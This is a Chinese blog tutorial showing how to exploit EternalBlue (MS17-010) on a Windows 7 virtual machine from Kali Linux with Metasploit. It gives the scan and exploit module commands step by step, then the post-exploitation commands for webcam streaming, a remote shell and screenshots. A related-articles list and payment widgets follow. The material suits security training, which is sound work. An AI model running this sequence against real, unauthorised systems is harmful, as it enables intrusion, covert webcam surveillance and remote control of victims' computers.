[虚拟机]KaLi 对 windows7的永恒之蓝漏洞的利用

最新推荐文章于 2024-03-10 15:38:07 发布
最新推荐文章于 2024-03-10 15:38:07 发布
阅读量1.1w 收藏 51
点赞数 9
分类专栏: Linux和虚拟机 文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46363249/article/details/109319900
版权

KaLi 对 windows7的永恒之蓝漏洞的利用

1. 首先我们要知道window7的IP地址,cmd中输入ipconfig中得知

在这里插入图片描述

2. 打开kali的终端,看看能不能ping通win7的ip

如下图就是没得问题了
在这里插入图片描述

3. Kali终端中打开msfc,search ms17_010

输入msfconsole出现如图,每次加载都是不一样的图片哦!!
在这里插入图片描述
再输入指令

search ms17_010

在这里插入图片描述#下的1是我们要使用的第一个模块,目的是用来扫描win7系统是否存在这个漏洞
我们输入

use 1
show options

在这里插入图片描述
这个时候我们要用到之前了解到的win7的IP,继续输入

set rhosts 刚才获取的ip
show options

然后我们看到了如下图:红框内就是我们刚才输入的ip地址
在这里插入图片描述

run

在这里插入图片描述
当初先如图的时候,我们的第一个环节结束,意思就是win7这个系统可以被利用

4、再打开一个终端,我们要开始攻击了

同样的步骤,终端中打开msfconsole,然后search ms17_010,然后use 2(这里使用use 2的意思就是要攻击了,1只是用来扫描),继续show options,再次set rhosts 刚才win7的ip地址,然后我们run
在这里插入图片描述

5、攻击成功后的成果获取

我们看到了最下面大大的——WIN——
nice ,攻击成功了,现在我们来挨个实现我们的操作:
(1)我们先来控制一下win7的摄像头,指令如下:

webcam_stream

也许这个时候会报错,那说明你的win7摄像头没有,如何确定自己win7的摄像头开了呢,如下图,就是win7开着摄像头呢
在这里插入图片描述
在这里插入图片描述胜利的比yeah!!!!

(2)拿shell
指令就一句话

shell

在这里插入图片描述
第二个红框内就是win7的cmd,我们通过这个来看一下win7的ip地址
在这里插入图片描述
在这里插入图片描述(3)截图
先退出win7的cmd后我们输入
在这里插入图片描述输入指令后kali界面就会跳出一个截图。

以上就是全部内容,谢谢大家,希望可以学到一些东西。

鹏华李
关注
  • 9
    点赞
  • 51
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
永恒之蓝漏洞扫描工具官方版
08-06
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。
Kali:永恒之蓝(最基础的攻击指令)
2201_75638644的博客
03-10 394
Kali利用永痕之蓝漏洞实现最基本对目标靶机的攻击。
MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)
hmysn的博客
12-22 2309
永恒之蓝漏洞攻击
永恒之蓝-------MS17010漏洞重现
2301_77144243的博客
06-07 2202
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
可刑又可拷!永恒之蓝漏洞原理及复现
hack0919的博客
04-24 4875
2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒
kali linux 2.0入侵windiws7系统 ------ms14-064漏洞
边城浪子的博客
08-07 3013
漏洞介绍: Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞利用模块 :exploit/windows/browser/ms14_064_ole_code_execu...
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1683
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
利用漏洞永恒之蓝ms17-010对win7目标进行渗透
ABABC1234的博客
07-06 978
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者不要利用技术做违法的事情,不然真的会很刑!!!
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 1706
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
kali利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 600
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击。
永恒之蓝漏洞演示
12-22
利用kali linuxwindows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝测试.docx
07-23
永恒之蓝测试,步骤很详细,适合新手观看。
win环境下虚拟机创建及kali的安装
08-02
在win环境在怎么安装VM,创建虚拟机,以及kali的安装方法和安装步骤图示
让 WSL2 中的 Kali 虚拟机使用无线网卡
01-06
让 WSL2 中的 Kali 虚拟机使用无线网卡为什么有这个项目改造 Kali,安装超级工具集WSL2 的改造思路编译内核代码并替换内核编译 USB/IP 工具在 Kali 中挂载无线网卡在 Windows 中提供 USB/IP 服务在 Kali 中启动 USB/...
基于matlab实现实现了基于项目的协同过滤代码,MATLAB实现.rar
05-04
基于matlab实现实现了基于项目的协同过滤代码,MATLAB实现.rar
各地区年末城镇登记失业人员及失业率.xls
最新发布
05-05
数据来源:中国劳动统计NJ-2023版
企业固定资产信息管理系统设计与实现.doc
05-04
企业固定资产信息管理系统设计与实现.doc
kali渗透windows7永恒之蓝
06-28
Kali是一款流行的渗透测试...永恒之蓝是一种利用Windows漏洞的攻击方式,可以让攻击者远程控制受害者的计算机。在使用Kali进行渗透测试时,需要注意使用合法的授权和遵守相关法律法规,以保证测试的合法性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鹏华李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值